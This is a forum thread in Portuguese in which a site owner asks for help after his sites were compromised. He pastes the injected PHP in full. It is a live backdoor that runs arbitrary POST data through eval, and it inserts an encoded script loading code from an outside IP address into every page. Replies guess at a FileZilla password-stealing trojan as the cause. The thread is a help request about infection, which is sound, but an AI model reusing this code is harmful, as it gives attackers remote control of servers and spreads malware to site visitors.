Vitima de sql injection

[bossal_jr 0]

É o seguinte pessoal... desde ontem meus sites passaram a exibir uma mensagem de vírus quando são acessados... utilizando firebug verifiquei que apareceram alguns códigos q não estão na programação do site.... os códigos que aparecem são esses:

 

//94.247.2.195/jquery.js

http://94.247.2.195/news/?id=101

//94.247.2.195/jquery.js

quando abro o arquivo em algum editor html eles não estão no código... de vez em quando aparece no código a seguinte função:

<?php if(!function_exists('tmp_lkojfghx'))
{if(isset($_POST['tmp_lkojfghx3']))
eval($_POST['tmp_lkojfghx3']);
if(!defined('TMP_XHGFJOKL'))
define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBl
KCclM0NGT3Njeno4ckNwaXB0Q3AlMjBzeno4cjF6YyUzRCU yRjF6JTJGOTF4NCUyRVYwbjJGTzQ3JTJFMjF4JTJFQ3AxOTUxeiUyRmpWMG5xeno4dTF6ZTF4cjJuSnk
xeCUyRTJuSmpzJTNFJTNDJTJGc2NyaVYwbnB6ejh0Rk8lM0UnKS5yZXBsYWNlKC9GT3wybkp8MXp8Q3B 8eno4fFYwbnwxeC9nLCIiKSk7CiAtLT48L3NjcmlwdD4='));
function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));
if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5)
{$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);
if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))
$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);
if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);
elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])
call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;
else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');
for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

Entrei em contato com meu provedor de hospedagem e me foi dito que posso ter sido vítima de sql injection ou algum arquivo infectado que pode ter sido enviado via ftp... alguém pode me ajudar?

[Kandrade 7]

Movendo para o fórum correto.

 

Plataforma Java http://forum.imasters.com.br/public/style_emoticons/default/seta.gif JavaScript

[maicon_m 0]

tive o mesmo problema e pelo que pesquisei é um trojan que invade o Filezilla e roupa usuários e senha. Desinstale o programa e procure desinfectar teu pc.

[bossal_jr 0]

Filezilla? Não lembro de ter instalado esse programa no meu pc...